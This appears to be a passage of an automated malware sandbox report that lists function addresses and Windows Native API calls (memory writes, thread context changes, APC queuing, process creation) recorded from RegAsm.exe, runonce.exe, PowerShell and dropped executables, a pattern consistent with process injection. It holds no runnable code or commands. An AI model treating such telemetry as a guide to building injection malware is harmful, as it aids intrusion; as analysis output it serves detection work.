Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02834340 NtSetContextThread,	10_2_02834340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02834650 NtSuspendThread,	10_2_02834650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832AB0 NtWaitForSingleObject,	10_2_02832AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832AD0 NtReadFile,	10_2_02832AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832AF0 NtWriteFile,	10_2_02832AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832B80 NtQueryInformationFile,	10_2_02832B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832BA0 NtEnumerateValueKey,	10_2_02832BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832BE0 NtQueryValueKey,	10_2_02832BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832BF0 NtAllocateVirtualMemory,	10_2_02832BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832E80 NtReadVirtualMemory,	10_2_02832E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832EA0 NtAdjustPrivilegesToken,	10_2_02832EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832EE0 NtQueueApcThread,	10_2_02832EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832E30 NtWriteVirtualMemory,	10_2_02832E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832F90 NtProtectVirtualMemory,	10_2_02832F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832FA0 NtQuerySection,	10_2_02832FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832FB0 NtResumeThread,	10_2_02832FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832FE0 NtCreateFile,	10_2_02832FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832F30 NtCreateSection,	10_2_02832F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832F60 NtCreateProcessEx,	10_2_02832F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832CA0 NtQueryInformationToken,	10_2_02832CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832CC0 NtQueryVirtualMemory,	10_2_02832CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832CF0 NtOpenProcess,	10_2_02832CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832C00 NtQueryInformationProcess,	10_2_02832C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832C60 NtCreateKey,	10_2_02832C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832DB0 NtEnumerateKey,	10_2_02832DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832DD0 NtDelayExecution,	10_2_02832DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832D00 NtSetInformationFile,	10_2_02832D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832D10 NtMapViewOfSection,	10_2_02832D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832D30 NtUnmapViewOfSection,	10_2_02832D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02833090 NtSetValueKey,	10_2_02833090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02833010 NtOpenDirectoryObject,	10_2_02833010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028339B0 NtGetContextThread,	10_2_028339B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02833D10 NtOpenProcessToken,	10_2_02833D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02833D70 NtOpenThread,	10_2_02833D70
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD4650 NtSuspendThread,LdrInitializeThunk,	13_2_04BD4650
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD4340 NtSetContextThread,LdrInitializeThunk,	13_2_04BD4340
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2CA0 NtQueryInformationToken,LdrInitializeThunk,	13_2_04BD2CA0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2C70 NtFreeVirtualMemory,LdrInitializeThunk,	13_2_04BD2C70
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2C60 NtCreateKey,LdrInitializeThunk,	13_2_04BD2C60
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2DF0 NtQuerySystemInformation,LdrInitializeThunk,	13_2_04BD2DF0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2DD0 NtDelayExecution,LdrInitializeThunk,	13_2_04BD2DD0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2D30 NtUnmapViewOfSection,LdrInitializeThunk,	13_2_04BD2D30
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2D10 NtMapViewOfSection,LdrInitializeThunk,	13_2_04BD2D10
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2E80 NtReadVirtualMemory,LdrInitializeThunk,	13_2_04BD2E80
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2EE0 NtQueueApcThread,LdrInitializeThunk,	13_2_04BD2EE0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2FB0 NtResumeThread,LdrInitializeThunk,	13_2_04BD2FB0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2FE0 NtCreateFile,LdrInitializeThunk,	13_2_04BD2FE0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2F30 NtCreateSection,LdrInitializeThunk,	13_2_04BD2F30
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2AF0 NtWriteFile,LdrInitializeThunk,	13_2_04BD2AF0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2AD0 NtReadFile,LdrInitializeThunk,	13_2_04BD2AD0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2BA0 NtEnumerateValueKey,LdrInitializeThunk,	13_2_04BD2BA0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	13_2_04BD2BF0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2BE0 NtQueryValueKey,LdrInitializeThunk,	13_2_04BD2BE0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2B60 NtClose,LdrInitializeThunk,	13_2_04BD2B60
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD35C0 NtCreateMutant,LdrInitializeThunk,	13_2_04BD35C0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD39B0 NtGetContextThread,LdrInitializeThunk,	13_2_04BD39B0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2CF0 NtOpenProcess,	13_2_04BD2CF0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2CC0 NtQueryVirtualMemory,	13_2_04BD2CC0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2C00 NtQueryInformationProcess,	13_2_04BD2C00
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2DB0 NtEnumerateKey,	13_2_04BD2DB0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2D00 NtSetInformationFile,	13_2_04BD2D00
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2EA0 NtAdjustPrivilegesToken,	13_2_04BD2EA0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2E30 NtWriteVirtualMemory,	13_2_04BD2E30
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2FA0 NtQuerySection,	13_2_04BD2FA0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2F90 NtProtectVirtualMemory,	13_2_04BD2F90
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2F60 NtCreateProcessEx,	13_2_04BD2F60
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2AB0 NtWaitForSingleObject,	13_2_04BD2AB0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD2B80 NtQueryInformationFile,	13_2_04BD2B80
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD3090 NtSetValueKey,	13_2_04BD3090
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD3010 NtOpenDirectoryObject,	13_2_04BD3010
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD3D10 NtOpenProcessToken,	13_2_04BD3D10
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD3D70 NtOpenThread,	13_2_04BD3D70
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_02C49680 NtReadFile,	13_2_02C49680
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_02C49780 NtDeleteFile,	13_2_02C49780
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_02C49510 NtCreateFile,	13_2_02C49510
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_02C49820 NtClose,	13_2_02C49820
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_02C49980 NtAllocateVirtualMemory,	13_2_02C49980
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04A0F2CF NtReadVirtualMemory,	13_2_04A0F2CF
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04A0F8C4 NtMapViewOfSection,	13_2_04A0F8C4

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04FB1CF0	2_2_04FB1CF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04FB1CA0	2_2_04FB1CA0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 9_2_00A610A0	9_2_00A610A0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 9_2_00A60AB8	9_2_00A60AB8
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 9_2_00A61488	9_2_00A61488
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 9_2_00A62E20	9_2_00A62E20
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 9_2_00A63830	9_2_00A63830
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 9_2_00A61A00	9_2_00A61A00
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 9_2_00A60848	9_2_00A60848
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 9_2_00A62848	9_2_00A62848
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 9_2_00A60AA9	9_2_00A60AA9
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 9_2_00A61091	9_2_00A61091
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 9_2_00A635F4	9_2_00A635F4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 9_2_00A63820	9_2_00A63820
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 9_2_00A60629	9_2_00A60629
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 9_2_00A62839	9_2_00A62839
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 9_2_00A63608	9_2_00A63608
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 9_2_00A61217	9_2_00A61217
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 9_2_00A62E1B	9_2_00A62E1B
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 9_2_00A63660	9_2_00A63660
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 9_2_00A61478	9_2_00A61478
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_004188F3	10_2_004188F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00403000	10_2_00403000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_004100CA	10_2_004100CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042F0D3	10_2_0042F0D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_004100D3	10_2_004100D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00401240	10_2_00401240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040E2E3	10_2_0040E2E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_004102F3	10_2_004102F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00416AFE	10_2_00416AFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00416B03	10_2_00416B03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00402462	10_2_00402462
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00402470	10_2_00402470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040E47C	10_2_0040E47C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040E427	10_2_0040E427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040E433	10_2_0040E433
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00402750	10_2_00402750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028802C0	10_2_028802C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028A0274	10_2_028A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028C03E6	10_2_028C03E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0280E3F0	10_2_0280E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028BA352	10_2_028BA352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02892000	10_2_02892000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028C01AA	10_2_028C01AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028B41A2	10_2_028B41A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028B81CC	10_2_028B81CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_027F0100	10_2_027F0100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0289A118	10_2_0289A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02888158	10_2_02888158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0281C6E0	10_2_0281C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_027FC7C0	10_2_027FC7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02824750	10_2_02824750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02800770	10_2_02800770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028AE4F6	10_2_028AE4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028A4420	10_2_028A4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028B2446	10_2_028B2446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028C0591	10_2_028C0591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02800535	10_2_02800535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_027FEA80	10_2_027FEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028B6BD7	10_2_028B6BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028BAB40	10_2_028BAB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0282E8F0	10_2_0282E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0280A840	10_2_0280A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02802840	10_2_02802840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_027E68B8	10_2_027E68B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028029A0	10_2_028029A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028CA9A6	10_2_028CA9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02816962	10_2_02816962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02812E90	10_2_02812E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028BCE93	10_2_028BCE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028BEEDB	10_2_028BEEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028BEE26	10_2_028BEE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02800E59	10_2_02800E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0287EFA0	10_2_0287EFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0280CFE0	10_2_0280CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02842F28	10_2_02842F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02820F30	10_2_02820F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_027F2FC8	10_2_027F2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028A2F30	10_2_028A2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02874F40	10_2_02874F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028A0CB5	10_2_028A0CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02800C00	10_2_02800C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_027F0CF2	10_2_027F0CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02818DBF	10_2_02818DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0280AD00	10_2_0280AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0289CD1F	10_2_0289CD1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_027FADE0	10_2_027FADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028052A0	10_2_028052A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0281B2C0	10_2_0281B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028A12ED	10_2_028A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0284739A	10_2_0284739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_027ED34C	10_2_027ED34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028B132D	10_2_028B132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028070C0	10_2_028070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028AF0CC	10_2_028AF0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028B70E9	10_2_028B70E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028BF0E0	10_2_028BF0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_027EF172	10_2_027EF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0280B1B0	10_2_0280B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028CB16B	10_2_028CB16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0283516C	10_2_0283516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028B16CC	10_2_028B16CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02845630	10_2_02845630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028BF7B0	10_2_028BF7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_027F17EC	10_2_027F17EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_027F1460	10_2_027F1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028BF43F	10_2_028BF43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0289D5B0	10_2_0289D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028C95C3	10_2_028C95C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028B7571	10_2_028B7571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02845AA0	10_2_02845AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0289DAAC	10_2_0289DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028A1AA3	10_2_028A1AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028ADAC6	10_2_028ADAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028BFA49	10_2_028BFA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028B7A46	10_2_028B7A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02873A6C	10_2_02873A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0281FB80	10_2_0281FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02875BF0	10_2_02875BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0283DBF9	10_2_0283DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028BFB76	10_2_028BFB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028038E0	10_2_028038E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0286D800	10_2_0286D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02895910	10_2_02895910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02809950	10_2_02809950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0281B950	10_2_0281B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02809EB0	10_2_02809EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02801F92	10_2_02801F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028BFFB1	10_2_028BFFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028BFF09	10_2_028BFF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_027C3FD5	10_2_027C3FD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_027C3FD2	10_2_027C3FD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028BFCF2	10_2_028BFCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02879C32	10_2_02879C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0281FDC0	10_2_0281FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02803D40	10_2_02803D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028B1D5A	10_2_028B1D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028B7D73	10_2_028B7D73
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 12_2_042684E0	12_2_042684E0
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 12_2_0426853E	12_2_0426853E
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 12_2_0426A54E	12_2_0426A54E
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 12_2_04270D5E	12_2_04270D5E
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 12_2_04270D59	12_2_04270D59
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 12_2_04268682	12_2_04268682
